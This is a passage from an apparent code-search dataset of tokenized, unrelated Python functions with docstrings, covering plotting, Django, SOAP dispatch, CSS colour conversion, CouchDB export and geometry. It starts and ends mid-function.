ax0 . xaxis . tick_top ( )
ax0 . xaxis . set_ticks_position ( 'none' )
ax0 . yaxis . set_ticks_position ( 'none' )
ax0 . spines [ 'top' ] . set_visible ( False )
ax0 . spines [ 'right' ] . set_visible ( False )
ax0 . spines [ 'bottom' ] . set_visible ( False )
ax0 . spines [ 'left' ] . set_visible ( False )
# Set up and rotate the column ticks . The labels argument is set to None by default . If the user specifies it in
# the argument , respect that specification . Otherwise display for < = 50 columns and do not display for > 50.
if labels or ( labels is None and len ( df . columns ) <= 50 ) :
ha = 'left'
ax0 . set_xticks ( list ( range ( 0 , width ) ) )
ax0 . set_xticklabels ( list ( df . columns ) , rotation = 45 , ha = ha , fontsize = fontsize )
else :
ax0 . set_xticks ( [ ] )
# Adds Timestamps ticks if freq is not None , else set up the two top - bottom row ticks .
if freq :
ts_list = [ ]
if type ( df . index ) == pd . PeriodIndex :
ts_array = pd . date_range ( df . index . to_timestamp ( ) . date [ 0 ] , df . index . to_timestamp ( ) . date [ - 1 ] , freq = freq ) . values
ts_ticks = pd . date_range ( df . index . to_timestamp ( ) . date [ 0 ] , df . index . to_timestamp ( ) . date [ - 1 ] , freq = freq ) . map ( lambda t : t . strftime ( '%Y-%m-%d' ) )
elif type ( df . index ) == pd . DatetimeIndex :
ts_array = pd . date_range ( df . index . date [ 0 ] , df . index . date [ - 1 ] , freq = freq ) . values
ts_ticks = pd . date_range ( df . index . date [ 0 ] , df . index . date [ - 1 ] , freq = freq ) . map ( lambda t : t . strftime ( '%Y-%m-%d' ) )
else :
raise KeyError ( 'Dataframe index must be PeriodIndex or DatetimeIndex.' )
try :
for value in ts_array :
ts_list . append ( df . index . get_loc ( value ) )
except KeyError :
raise KeyError ( 'Could not divide time index into desired frequency.' )
ax0 . set_yticks ( ts_list )
ax0 . set_yticklabels ( ts_ticks , fontsize = int ( fontsize / 16 * 20 ) , rotation = 0 )
else :
ax0 . set_yticks ( [ 0 , df . shape [ 0 ] - 1 ] )
ax0 . set_yticklabels ( [ 1 , df . shape [ 0 ] ] , fontsize = int ( fontsize / 16 * 20 ) , rotation = 0 )
# Create the inter - column vertical grid .
in_between_point = [ x + 0.5 for x in range ( 0 , width - 1 ) ]
for in_between_point in in_between_point :
ax0 . axvline ( in_between_point , linestyle = '-' , color = 'white' )
if sparkline : # Calculate row - wise completeness for the sparkline .
completeness_srs = df . notnull ( ) . astype ( bool ) . sum ( axis = 1 )
x_domain = list ( range ( 0 , height ) )
y_range = list ( reversed ( completeness_srs . values ) )
min_completeness = min ( y_range )
max_completeness = max ( y_range )
min_completeness_index = y_range . index ( min_completeness )
max_completeness_index = y_range . index ( max_completeness )
# Set up the sparkline , remove the border element .
ax1 . grid ( b = False )
ax1 . set_aspect ( 'auto' )
# GH 25
if int ( mpl . __version__ [ 0 ] ) <= 1 :
ax1 . set_axis_bgcolor ( ( 1 , 1 , 1 ) )
else :
ax1 . set_facecolor ( ( 1 , 1 , 1 ) )
ax1 . spines [ 'top' ] . set_visible ( False )
ax1 . spines [ 'right' ] . set_visible ( False )
ax1 . spines [ 'bottom' ] . set_visible ( False )
ax1 . spines [ 'left' ] . set_visible ( False )
ax1 . set_ymargin ( 0 )
# Plot sparkline - - - plot is sideways so the x and y axis are reversed .
ax1 . plot ( y_range , x_domain , color = color )
if labels : # Figure out what case to display the label in : mixed , upper , lower .
label = 'Data Completeness'
if str ( df . columns [ 0 ] ) . islower ( ) :
label = label . lower ( )
if str ( df . columns [ 0 ] ) . isupper ( ) :
label = label . upper ( )
# Set up and rotate the sparkline label .
ha = 'left'
ax1 . set_xticks ( [ min_completeness + ( max_completeness - min_completeness ) / 2 ] )
ax1 . set_xticklabels ( [ label ] , rotation = 45 , ha = ha , fontsize = fontsize )
ax1 . xaxis . tick_top ( )
ax1 . set_yticks ( [ ] )
else :
ax1 . set_xticks ( [ ] )
ax1 . set_yticks ( [ ] )
# Add maximum and minimum labels , circles .
ax1 . annotate ( max_completeness , xy = ( max_completeness , max_completeness_index ) , xytext = ( max_completeness + 2 , max_completeness_index ) , fontsize = int ( fontsize / 16 * 14 ) , va = 'center' , ha = 'left' )
ax1 . annotate ( min_completeness , xy = ( min_completeness , min_completeness_index ) , xytext = ( min_completeness - 2 , min_completeness_index ) , fontsize = int ( fontsize / 16 * 14 ) , va = 'center' , ha = 'right' )
ax1 . set_xlim ( [ min_completeness - 2 , max_completeness + 2 ] )
# Otherwise the circles are cut off .
ax1 . plot ( [ min_completeness ] , [ min_completeness_index ] , '.' , color = color , markersize = 10.0 )
ax1 . plot ( [ max_completeness ] , [ max_completeness_index ] , '.' , color = color , markersize = 10.0 )
# Remove tick mark ( only works after plotting ) .
ax1 . xaxis . set_ticks_position ( 'none' )
if inline :
plt . show ( )
else :
return ax0
|
def getContactItems ( self , person ) :
"""Return a C { list } of the L { Notes } items associated with the given
person . If none exist , create one , wrap it in a list and return it .
@ type person : L { Person }"""
|
notes = list ( person . store . query ( Notes , Notes . person == person ) )
if not notes :
return [ Notes ( store = person . store , person = person , notes = u'' ) ]
return notes
|
def patched_get_current ( self , request = None ) :
"""Monkey patched version of Django ' s SiteManager . get _ current ( ) function .
Returns the current Site based on a given request or the SITE _ ID in
the project ' s settings . If a request is given attempts to match a site
with domain matching request . get _ host ( ) . If a request is not given or
a site cannot be found based on the host of the request , we return the
site which matches the configured SITE _ ID setting ."""
|
# Imported here to avoid circular import
from django . conf import settings
if request :
try :
return self . _get_site_by_request ( request )
# pylint : disable = protected - access
except Site . DoesNotExist :
pass
if getattr ( settings , 'SITE_ID' , '' ) :
return self . _get_site_by_id ( settings . SITE_ID )
# pylint : disable = protected - access
raise ImproperlyConfigured ( "You're using the Django \"sites framework\" without having " "set the SITE_ID setting. Create a site in your database and " "set the SITE_ID setting or pass a request to " "Site.objects.get_current() to fix this error." )
|
def _update_data_dict ( self , data_dict , back_or_front ) :
"""Adds spct if relevant , adds service"""
|
data_dict [ 'back_or_front' ] = back_or_front
# The percentage of used sessions based on ' scur ' and ' slim '
if 'slim' in data_dict and 'scur' in data_dict :
try :
data_dict [ 'spct' ] = ( data_dict [ 'scur' ] / data_dict [ 'slim' ] ) * 100
except ( TypeError , ZeroDivisionError ) :
pass
|
def getall ( fn , page = None , * args , ** kwargs ) :
"""Auto - iterate over the paginated results of various methods of the API .
Pass the GitLabAPI method as the first argument , followed by the
other parameters as normal . Include ` page ` to determine first page to poll .
Remaining kwargs are passed on to the called method , including ` per _ page ` .
: param fn : Actual method to call
: param page : Optional , page number to start at , defaults to 1
: param args : Positional arguments to actual method
: param kwargs : Keyword arguments to actual method
: return : Yields each item in the result until exhausted , and then implicit StopIteration ; or no elements if error"""
|
if not page :
page = 1
while True :
results = fn ( * args , page = page , ** kwargs )
if not results :
break
for x in results :
yield x
page += 1
|
def _posix_split_name ( self , name ) :
"""Split a name longer than 100 chars into a prefix
and a name part ."""
|
prefix = name [ : LENGTH_PREFIX + 1 ]
while prefix and prefix [ - 1 ] != "/" :
prefix = prefix [ : - 1 ]
name = name [ len ( prefix ) : ]
prefix = prefix [ : - 1 ]
if not prefix or len ( name ) > LENGTH_NAME :
raise ValueError ( "name is too long" )
return prefix , name
|
def unparse_color ( r , g , b , a , type ) :
"""Take the r , g , b , a color values and give back
a type css color string . This is the inverse function of parse _ color"""
|
if type == '#rgb' : # Don ' t lose precision on rgb shortcut
if r % 17 == 0 and g % 17 == 0 and b % 17 == 0 :
return '#%x%x%x' % ( int ( r / 17 ) , int ( g / 17 ) , int ( b / 17 ) )
type = '#rrggbb'
if type == '#rgba' :
if r % 17 == 0 and g % 17 == 0 and b % 17 == 0 :
return '#%x%x%x%x' % ( int ( r / 17 ) , int ( g / 17 ) , int ( b / 17 ) , int ( a * 15 ) )
type = '#rrggbbaa'
if type == '#rrggbb' :
return '#%02x%02x%02x' % ( r , g , b )
if type == '#rrggbbaa' :
return '#%02x%02x%02x%02x' % ( r , g , b , int ( a * 255 ) )
if type == 'rgb' :
return 'rgb(%d, %d, %d)' % ( r , g , b )
if type == 'rgba' :
return 'rgba(%d, %d, %d, %g)' % ( r , g , b , a )
|
def minify_js_files ( ) :
"""This command minified js files with UglifyJS"""
|
for k , v in JS_FILE_MAPPING . items ( ) :
input_files = " " . join ( v [ "input_files" ] )
output_file = v [ "output_file" ]
uglifyjs_command = "uglifyjs {input_files} -o {output_file}" . format ( input_files = input_files , output_file = output_file )
local ( uglifyjs_command )
|
def to_json ( self ) :
"""Return a ` dict ` representation of the resource , including all properties and tags
Returns :
` dict `"""
|
return { 'resourceType' : self . resource . resource_type_id , 'resourceId' : self . id , 'accountId' : self . resource . account_id , 'account' : self . account , 'location' : self . resource . location , 'properties' : { to_camelcase ( prop . name ) : prop . value for prop in self . resource . properties } , 'tags' : [ { 'key' : t . key , 'value' : t . value } for t in self . resource . tags ] }
|
def parse_argv ( ) :
"""Parse command line arguments . Settings will be stored in the global
variables declared above ."""
|
parser = argparse . ArgumentParser ( description = 'Find lyrics for a set of mp3' ' files and embed them as metadata' )
parser . add_argument ( '-j' , '--jobs' , help = 'Number of parallel processes' , type = int , metavar = 'N' , default = 1 )
parser . add_argument ( '-o' , '--overwrite' , help = 'Overwrite lyrics of songs' ' that already have them' , action = 'store_true' )
parser . add_argument ( '-s' , '--stats' , help = 'Print a series of statistics at' ' the end of the execution' , action = 'store_true' )
parser . add_argument ( '-v' , '--verbose' , help = 'Set verbosity level (pass it' ' up to three times)' , action = 'count' )
parser . add_argument ( '-d' , '--debug' , help = 'Enable debug output' , action = 'store_true' )
group = parser . add_mutually_exclusive_group ( )
group . add_argument ( '-r' , '--recursive' , help = 'Recursively search for' ' mp3 files' , metavar = 'path' , nargs = '?' , const = '.' )
group . add_argument ( '--from-file' , help = 'Read a list of files from a text' ' file' , type = str )
parser . add_argument ( 'songs' , help = 'The files/songs to search lyrics for' , nargs = '*' )
args = parser . parse_args ( )
CONFIG [ 'overwrite' ] = args . overwrite
CONFIG [ 'print_stats' ] = args . stats
if args . verbose is None or args . verbose == 0 :
logger . setLevel ( logging . CRITICAL )
elif args . verbose == 1 :
logger . setLevel ( logging . INFO )
else :
logger . setLevel ( logging . DEBUG )
if args . jobs <= 0 :
msg = 'Argument -j/--jobs should have a value greater than zero'
parser . error ( msg )
else :
CONFIG [ 'jobcount' ] = args . jobs
songs = set ( )
if args . from_file :
songs = load_from_file ( args . from_file )
if not songs :
raise ValueError ( 'No file names found in file' )
elif args . recursive :
mp3files = glob . iglob ( args . recursive + '/**/*.mp3' , recursive = True )
songs = set ( Song . from_filename ( f ) for f in mp3files )
elif args . songs :
if os . path . exists ( args . songs [ 0 ] ) :
parser = Song . from_filename
else :
parser = Song . from_string
songs . update ( map ( parser , args . songs ) )
else :
songs . add ( get_current_song ( ) )
# Just in case some song constructors failed , remove all the Nones
return songs . difference ( { None } )
|
def getid ( self , ref ) :
"""Obtain the reference number of the vgroup following the
vgroup with the given reference number .
Args : :
ref reference number of the vgroup after which to search ;
set to - 1 to start the search at the start of
the HDF file
Returns : :
reference number of the vgroup past the one identified by ' ref '
An exception is raised if the end of the vgroup is reached .
C library equivalent : Vgetid"""
|
num = _C . Vgetid ( self . _hdf_inst . _id , ref )
_checkErr ( 'getid' , num , "bad arguments or last vgroup reached" )
return num
|
def get_trace_id ( ) :
"""Helper to get trace _ id from web application request header .
: rtype : str
: returns : TraceID in HTTP request headers ."""
|
checkers = ( get_trace_id_from_django , get_trace_id_from_flask , get_trace_id_from_webapp2 , )
for checker in checkers :
trace_id = checker ( )
if trace_id is not None :
return trace_id
return None
|
def power ( base , exp ) :
"""Returns result of first array elements raised to powers from second array , element - wise
with broadcasting .
Equivalent to ` ` base * * exp ` ` and ` ` mx . nd . broadcast _ power ( lhs , rhs ) ` ` .
. . note : :
If the corresponding dimensions of two arrays have the same size or one of them has size 1,
then the arrays are broadcastable to a common shape .
Parameters
base : scalar or NDArray
The base array
exp : scalar or NDArray
The exponent array . If ` ` base . shape ! = exp . shape ` ` , they must be
broadcastable to a common shape .
Returns
NDArray
The bases in x raised to the exponents in y .
Examples
> > > x = mx . nd . ones ( ( 2,3 ) ) * 2
> > > y = mx . nd . arange ( 1,3 ) . reshape ( ( 2,1 ) )
> > > z = mx . nd . arange ( 1,3 ) . reshape ( ( 2,1 ) )
> > > x . asnumpy ( )
array ( [ [ 2 . , 2 . , 2 . ] ,
[ 2 . , 2 . , 2 . ] ] , dtype = float32)
> > > y . asnumpy ( )
array ( [ [ 1 . ] ,
[ 2 . ] ] , dtype = float32)
> > > z . asnumpy ( )
array ( [ [ 1 . ] ,
[ 2 . ] ] , dtype = float32)
> > > ( x * * 2 ) . asnumpy ( )
array ( [ [ 4 . , 4 . , 4 . ] ,
[ 4 . , 4 . , 4 . ] ] , dtype = float32)
> > > ( x * * y ) . asnumpy ( )
array ( [ [ 2 . , 2 . , 2 . ] ,
[ 4 . , 4 . , 4 . ] ] , dtype = float32)
> > > mx . nd . power ( x , y ) . asnumpy ( )
array ( [ [ 2 . , 2 . , 2 . ] ,
[ 4 . , 4 . , 4 . ] ] , dtype = float32)
> > > ( z * * y ) . asnumpy ( )
array ( [ [ 1 . ] ,
[ 4 . ] ] , dtype = float32)"""
|
# pylint : disable = no - member , protected - access
return _ufunc_helper ( base , exp , op . broadcast_power , operator . pow , _internal . _power_scalar , _internal . _rpower_scalar )
|
def parse_friends ( self , friends_page ) :
"""Parses the DOM and returns user friends attributes .
: type friends _ page : : class : ` bs4 . BeautifulSoup `
: param friends _ page : MAL user friends page ' s DOM
: rtype : dict
: return : User friends attributes ."""
|
user_info = self . parse_sidebar ( friends_page )
second_col = friends_page . find ( u'div' , { u'id' : u'content' } ) . find ( u'table' ) . find ( u'tr' ) . find_all ( u'td' , recursive = False ) [ 1 ]
try :
user_info [ u'friends' ] = { }
friends = second_col . find_all ( u'div' , { u'class' : u'friendHolder' } )
if friends :
for row in friends :
block = row . find ( u'div' , { u'class' : u'friendBlock' } )
cols = block . find_all ( u'div' )
friend_link = cols [ 1 ] . find ( u'a' )
friend = self . session . user ( friend_link . text )
friend_info = { }
if len ( cols ) > 2 and cols [ 2 ] . text != u'' :
friend_info [ u'last_active' ] = utilities . parse_profile_date ( cols [ 2 ] . text . strip ( ) )
if len ( cols ) > 3 and cols [ 3 ] . text != u'' :
friend_info [ u'since' ] = utilities . parse_profile_date ( cols [ 3 ] . text . replace ( u'Friends since' , '' ) . strip ( ) )
user_info [ u'friends' ] [ friend ] = friend_info
except :
if not self . session . suppress_parse_exceptions :
raise
return user_info
|
def find_additional_rels ( self , all_models ) :
"""Attempts to scan for additional relationship fields for this model based on all of the other models '
structures and relationships ."""
|
for model_name , model in iteritems ( all_models ) :
if model_name != self . name :
for field_name in model . field_names :
field = model . fields [ field_name ]
# if this field type references the current model
if field . field_type == self . name and field . back_populates is not None and ( isinstance ( field , StatikForeignKeyField ) or isinstance ( field , StatikManyToManyField ) ) :
self . additional_rels [ field . back_populates ] = { 'to_model' : model_name , 'back_populates' : field_name , 'secondary' : ( model_name , field . field_type ) if isinstance ( field , StatikManyToManyField ) else None }
logger . debug ( 'Additional relationship %s.%s -> %s (%s)' , self . name , field . back_populates , model_name , self . additional_rels [ field . back_populates ] )
|
def get_hypo_location ( self , mesh_spacing , hypo_loc = None ) :
"""The method determines the location of the hypocentre within the rupture
: param mesh :
: class : ` ~ openquake . hazardlib . geo . mesh . Mesh ` of points
: param mesh _ spacing :
The desired distance between two adjacent points in source ' s
ruptures ' mesh , in km . Mainly this parameter allows to balance
the trade - off between time needed to compute the distance
between the rupture surface and a site and the precision of that
computation .
: param hypo _ loc :
Hypocentre location as fraction of rupture plane , as a tuple of
( Along Strike , Down Dip ) , e . g . a hypocentre located in the centroid
of the rupture would be input as ( 0.5 , 0.5 ) , whereas a
hypocentre located in a position 3/4 along the length , and 1/4 of
the way down dip of the rupture plane would be entered as
(0.75 , 0.25 ) .
: returns :
Hypocentre location as instance of
: class : ` ~ openquake . hazardlib . geo . point . Point `"""
|
mesh = self . mesh
centroid = mesh . get_middle_point ( )
if hypo_loc is None :
return centroid
total_len_y = ( len ( mesh . depths ) - 1 ) * mesh_spacing
y_distance = hypo_loc [ 1 ] * total_len_y
y_node = int ( numpy . round ( y_distance / mesh_spacing ) )
total_len_x = ( len ( mesh . lons [ y_node ] ) - 1 ) * mesh_spacing
x_distance = hypo_loc [ 0 ] * total_len_x
x_node = int ( numpy . round ( x_distance / mesh_spacing ) )
hypocentre = Point ( mesh . lons [ y_node ] [ x_node ] , mesh . lats [ y_node ] [ x_node ] , mesh . depths [ y_node ] [ x_node ] )
return hypocentre
|
def unparse ( self , dn , record ) :
"""Write an entry or change record to the output file .
: type dn : string
: param dn : distinguished name
: type record : Union [ Dict [ string , List [ string ] ] , List [ Tuple ] ]
: param record : Either a dictionary holding an entry or a list of
additions ( 2 - tuple ) or modifications ( 3 - tuple ) ."""
|
self . _unparse_attr ( 'dn' , dn )
if isinstance ( record , dict ) :
self . _unparse_entry_record ( record )
elif isinstance ( record , list ) :
self . _unparse_change_record ( record )
else :
raise ValueError ( "Argument record must be dictionary or list" )
self . _output_file . write ( self . _line_sep )
self . records_written += 1
|
def open_and_reorient_image ( handle ) :
"""Load the image from the specified file and orient the image accordingly
to the Exif tag that the file might embed , which would indicate the
orientation of the camera relative to the captured scene .
@ param handle : a Python file object .
@ return : an instance returned by the Python Library Image library ."""
|
# Retrieve tags from the Exchangeable image file format ( Exif )
# included in the picture . If the orientation of the picture is not
# top left side , rotate it accordingly .
# @ deprecated
# exif _ tags = dict ( [ ( exif _ tag . tag , exif _ tag )
# for exif _ tag in exif . process _ file ( handle ) . itervalues ( )
# if hasattr ( exif _ tag , ' tag ' ) ] )
exif_tags = exifread . process_file ( handle )
exif_tag_orientation = exif_tags . get ( EXIF_TAG_ORIENTATION )
rotation_angle = exif_tag_orientation and { 3L : 180 , 6L : 270 , 8L : 90 } . get ( exif_tag_orientation . values [ 0 ] )
handle . seek ( 0 )
# exif . process _ file has updated the file ' s current position .
image = Image . open ( handle )
return image if rotation_angle is None else image . rotate ( rotation_angle )
|
def copy ( self ) :
"""Returns a new copy of a C { ParseResults } object ."""
|
ret = ParseResults ( self . __toklist )
ret . __tokdict = self . __tokdict . copy ( )
ret . __parent = self . __parent
ret . __accumNames . update ( self . __accumNames )
ret . __name = self . __name
return ret
|
def _Dispatch ( ps , server , SendResponse , SendFault , post , action , nsdict = { } , ** kw ) :
'''Send ParsedSoap instance to ServiceContainer , which dispatches to
appropriate service via post , and method via action . Response is a
self - describing pyobj , which is passed to a SoapWriter .
Call SendResponse or SendFault to send the reply back , appropriately .
server - - ServiceContainer instance'''
|
localURL = 'http://%s:%d%s' % ( server . server_name , server . server_port , post )
address = action
service = server . getNode ( post )
isWSResource = False
if isinstance ( service , WSAResource ) :
isWSResource = True
service . setServiceURL ( localURL )
address = Address ( )
try :
address . parse ( ps )
except Exception , e :
return SendFault ( FaultFromException ( e , 0 , sys . exc_info ( ) [ 2 ] ) , ** kw )
if action and action != address . getAction ( ) :
e = WSActionException ( 'SOAP Action("%s") must match WS-Action("%s") if specified.' % ( action , address . getAction ( ) ) )
return SendFault ( FaultFromException ( e , 0 , None ) , ** kw )
action = address . getAction ( )
if isinstance ( service , ServiceInterface ) is False :
e = NoSuchService ( 'no service at POST(%s) in container: %s' % ( post , server ) )
return SendFault ( FaultFromException ( e , 0 , sys . exc_info ( ) [ 2 ] ) , ** kw )
if not service . authorize ( None , post , action ) :
return SendFault ( Fault ( Fault . Server , "Not authorized" ) , code = 401 )
# try :
# raise NotAuthorized ( )
# except Exception , e :
# return SendFault ( FaultFromException ( e , 0 , None ) , code = 401 , * * kw )
# # return SendFault ( FaultFromException ( NotAuthorized ( ) , 0 , None ) , code = 401 , * * kw )
try :
method = service . getOperation ( ps , address )
except Exception , e :
return SendFault ( FaultFromException ( e , 0 , sys . exc_info ( ) [ 2 ] ) , ** kw )
try :
if isWSResource is True :
request , result = method ( ps , address )
else :
request , result = method ( ps )
except Exception , e :
return SendFault ( FaultFromException ( e , 0 , sys . exc_info ( ) [ 2 ] ) , ** kw )
# Verify if Signed
service . verify ( ps )
# If No response just return .
if result is None :
return SendResponse ( '' , ** kw )
sw = SoapWriter ( nsdict = nsdict )
try :
sw . serialize ( result )
except Exception , e :
return SendFault ( FaultFromException ( e , 0 , sys . exc_info ( ) [ 2 ] ) , ** kw )
if isWSResource is True :
action = service . getResponseAction ( ps , action )
addressRsp = Address ( action = action )
try :
addressRsp . setResponseFromWSAddress ( address , localURL )
addressRsp . serialize ( sw )
except Exception , e :
return SendFault ( FaultFromException ( e , 0 , sys . exc_info ( ) [ 2 ] ) , ** kw )
# Create Signatures
service . sign ( sw )
try :
soapdata = str ( sw )
return SendResponse ( soapdata , ** kw )
except Exception , e :
return SendFault ( FaultFromException ( e , 0 , sys . exc_info ( ) [ 2 ] ) , ** kw )
|
def generator ( name ) :
"""Return generator by its name
: param name : name of hash - generator
: return : WHashGeneratorProto class"""
|
name = name . upper ( )
if name not in WHash . __hash_map__ . keys ( ) :
raise ValueError ( 'Hash generator "%s" not available' % name )
return WHash . __hash_map__ [ name ]
|
def _get_action ( self , action_meta ) :
'''Parse action and turn into a calling point .
: param action _ meta :
: return :'''
|
conf = { 'fun' : list ( action_meta . keys ( ) ) [ 0 ] , 'arg' : [ ] , 'kwargs' : { } , }
if not len ( conf [ 'fun' ] . split ( '.' ) ) - 1 :
conf [ 'salt.int.intfunc' ] = True
action_meta = action_meta [ conf [ 'fun' ] ]
info = action_meta . get ( 'info' , 'Action for {}' . format ( conf [ 'fun' ] ) )
for arg in action_meta . get ( 'args' ) or [ ] :
if not isinstance ( arg , dict ) :
conf [ 'arg' ] . append ( arg )
else :
conf [ 'kwargs' ] . update ( arg )
return info , action_meta . get ( 'output' ) , conf
|
def AQLQuery ( self , query , batchSize = 100 , rawResults = False , bindVars = { } , options = { } , count = False , fullCount = False , json_encoder = None , ** moreArgs ) :
"""Set rawResults = True if you want the query to return dictionnaries instead of Document objects .
You can use * * moreArgs to pass more arguments supported by the api , such as ttl = 60 ( time to live )"""
|
return AQLQuery ( self , query , rawResults = rawResults , batchSize = batchSize , bindVars = bindVars , options = options , count = count , fullCount = fullCount , json_encoder = json_encoder , ** moreArgs )
|
def set_reference ( self , ref ) :
"""Set the reference sequence
: param ref : reference sequence
: type ref : string"""
|
self . _options = self . _options . _replace ( reference = ref )
|
def get_vbox_version ( config_kmk ) :
"Return the vbox config major , minor , build"
|
with open ( config_kmk , 'rb' ) as f :
config = f . read ( )
major = b"6"
# re . search ( b " VBOX _ VERSION _ MAJOR = ( ? P < major > [ \ d ] ) " , config ) . groupdict ( ) [ ' major ' ]
minor = b"0"
# re . search ( b " VBOX _ VERSION _ MINOR = ( ? P < minor > [ \ d ] ) " , config ) . groupdict ( ) [ ' minor ' ]
build = b"4"
# re . search ( b " VBOX _ VERSION _ BUILD = ( ? P < build > [ \ d ] ) " , config ) . groupdict ( ) [ ' build ' ]
return b"." . join ( [ major , minor , build ] )
|
def export ( self , name , columns , points ) :
"""Write the points to the CouchDB server ."""
|
logger . debug ( "Export {} stats to CouchDB" . format ( name ) )
# Create DB input
data = dict ( zip ( columns , points ) )
# Set the type to the current stat name
data [ 'type' ] = name
data [ 'time' ] = couchdb . mapping . DateTimeField ( ) . _to_json ( datetime . now ( ) )
# Write input to the CouchDB database
# Result can be view : http : / / 127.0.0.1:5984 / _ utils
try :
self . client [ self . db ] . save ( data )
except Exception as e :
logger . error ( "Cannot export {} stats to CouchDB ({})" . format ( name , e ) )
|
def __log ( self , method_name ) :
"""Logs the deprecation message on first call , does nothing after
: param method _ name : Name of the deprecated method"""
|
if not self . __already_logged : # Print only if not already done
stack = "\n\t" . join ( traceback . format_stack ( ) )
logging . getLogger ( self . __logger ) . warning ( "%s: %s\n%s" , method_name , self . __message , stack )
self . __already_logged = True
|
def plot_violin ( data , var_names = None , quartiles = True , credible_interval = 0.94 , shade = 0.35 , bw = 4.5 , sharey = True , figsize = None , textsize = None , ax = None , kwargs_shade = None , ) :
"""Plot posterior of traces as violin plot .
Notes
If multiple chains are provided for a variable they will be combined
Parameters
data : obj
Any object that can be converted to an az . InferenceData object
Refer to documentation of az . convert _ to _ dataset for details
var _ names : list , optional
List of variables to plot ( defaults to None , which results in all variables plotted )
quartiles : bool , optional
Flag for plotting the interquartile range , in addition to the credible _ interval * 100%
intervals . Defaults to True
credible _ interval : float , optional
Credible intervals . Defaults to 0.94.
shade : float
Alpha blending value for the shaded area under the curve , between 0
( no shade ) and 1 ( opaque ) . Defaults to 0
bw : float
Bandwidth scaling factor . Should be larger than 0 . The higher this number the smoother the
KDE will be . Defaults to 4.5 which is essentially the same as the Scott ' s rule of thumb
( the default rule used by SciPy ) .
figsize : tuple
Figure size . If None it will be defined automatically .
textsize : int
Text size of the point _ estimates , axis ticks , and HPD . If None it will be autoscaled
based on figsize .
sharey : bool
Defaults to True , violinplots share a common y - axis scale .
ax : matplotlib axes
kwargs _ shade : dicts , optional
Additional keywords passed to ` fill _ between ` , or ` barh ` to control the shade
Returns
ax : matplotlib axes"""
|
data = convert_to_dataset ( data , group = "posterior" )
var_names = _var_names ( var_names , data )
plotters = list ( xarray_var_iter ( data , var_names = var_names , combined = True ) )
if kwargs_shade is None :
kwargs_shade = { }
( figsize , ax_labelsize , _ , xt_labelsize , linewidth , _ ) = _scale_fig_size ( figsize , textsize , 1 , len ( plotters ) )
ax_labelsize *= 2
if ax is None :
fig , ax = plt . subplots ( 1 , len ( plotters ) , figsize = figsize , sharey = sharey , constrained_layout = True )
else :
fig = ax . figure
ax = np . atleast_1d ( ax )
for axind , ( var_name , selection , x ) in enumerate ( plotters ) :
val = x . flatten ( )
if val [ 0 ] . dtype . kind == "i" :
cat_hist ( val , shade , ax [ axind ] , ** kwargs_shade )
else :
_violinplot ( val , shade , bw , ax [ axind ] , ** kwargs_shade )
per = np . percentile ( val , [ 25 , 75 , 50 ] )
hpd_intervals = hpd ( val , credible_interval )
if quartiles :
ax [ axind ] . plot ( [ 0 , 0 ] , per [ : 2 ] , lw = linewidth * 3 , color = "k" , solid_capstyle = "round" )
ax [ axind ] . plot ( [ 0 , 0 ] , hpd_intervals , lw = linewidth , color = "k" , solid_capstyle = "round" )
ax [ axind ] . plot ( 0 , per [ - 1 ] , "wo" , ms = linewidth * 1.5 )
ax [ axind ] . set_xlabel ( make_label ( var_name , selection ) , fontsize = ax_labelsize )
ax [ axind ] . set_xticks ( [ ] )
ax [ axind ] . tick_params ( labelsize = xt_labelsize )
ax [ axind ] . grid ( None , axis = "x" )
if sharey :
fig . subplots_adjust ( wspace = 0 )
else :
fig . tight_layout ( )
return ax
|
def idx_num_to_name ( L ) :
"""Switch from index - by - number to index - by - name .
: param dict L : Metadata
: return dict L : Metadata"""
|
logger_jsons . info ( "enter idx_num_to_name" )
try :
if "paleoData" in L :
L [ "paleoData" ] = _import_data ( L [ "paleoData" ] , "paleo" )
if "chronData" in L :
L [ "chronData" ] = _import_data ( L [ "chronData" ] , "chron" )
except Exception as e :
logger_jsons . error ( "idx_num_to_name: {}" . format ( e ) )
print ( "Error: idx_name_to_num: {}" . format ( e ) )
logger_jsons . info ( "exit idx_num_to_name" )
return L
|
def get_referenced_object_as_list ( prev_obj , obj , dot_separated_name , desired_type = None ) :
"""Same as get _ referenced _ object , but always returns a list .
Args :
prev _ obj : see get _ referenced _ object
obj : see get _ referenced _ object
dot _ separated _ name : see get _ referenced _ object
desired _ type : see get _ referenced _ object
Returns :
same as get _ referenced _ object , but always returns a list"""
|
res = get_referenced_object ( prev_obj , obj , dot_separated_name , desired_type )
if res is None :
return [ ]
elif type ( res ) is list :
return res
else :
return [ res ]
|
def from_origin_axis_angle ( origin , axis , angle , angle_in_radians = False ) :
"""Generates a SymmOp for a rotation about a given axis through an
origin .
Args :
origin ( 3x1 array ) : The origin which the axis passes through .
axis ( 3x1 array ) : The axis of rotation in cartesian space . For
example , [ 1 , 0 , 0 ] indicates rotation about x - axis .
angle ( float ) : Angle of rotation .
angle _ in _ radians ( bool ) : Set to True if angles are given in
radians . Or else , units of degrees are assumed .
Returns :
SymmOp ."""
|
theta = angle * pi / 180 if not angle_in_radians else angle
a = origin [ 0 ]
b = origin [ 1 ]
c = origin [ 2 ]
u = axis [ 0 ]
v = axis [ 1 ]
w = axis [ 2 ]
# Set some intermediate values .
u2 = u * u
v2 = v * v
w2 = w * w
cos_t = cos ( theta )
sin_t = sin ( theta )
l2 = u2 + v2 + w2
l = sqrt ( l2 )
# Build the matrix entries element by element .
m11 = ( u2 + ( v2 + w2 ) * cos_t ) / l2
m12 = ( u * v * ( 1 - cos_t ) - w * l * sin_t ) / l2
m13 = ( u * w * ( 1 - cos_t ) + v * l * sin_t ) / l2
m14 = ( a * ( v2 + w2 ) - u * ( b * v + c * w ) + ( u * ( b * v + c * w ) - a * ( v2 + w2 ) ) * cos_t + ( b * w - c * v ) * l * sin_t ) / l2
m21 = ( u * v * ( 1 - cos_t ) + w * l * sin_t ) / l2
m22 = ( v2 + ( u2 + w2 ) * cos_t ) / l2
m23 = ( v * w * ( 1 - cos_t ) - u * l * sin_t ) / l2
m24 = ( b * ( u2 + w2 ) - v * ( a * u + c * w ) + ( v * ( a * u + c * w ) - b * ( u2 + w2 ) ) * cos_t + ( c * u - a * w ) * l * sin_t ) / l2
m31 = ( u * w * ( 1 - cos_t ) - v * l * sin_t ) / l2
m32 = ( v * w * ( 1 - cos_t ) + u * l * sin_t ) / l2
m33 = ( w2 + ( u2 + v2 ) * cos_t ) / l2
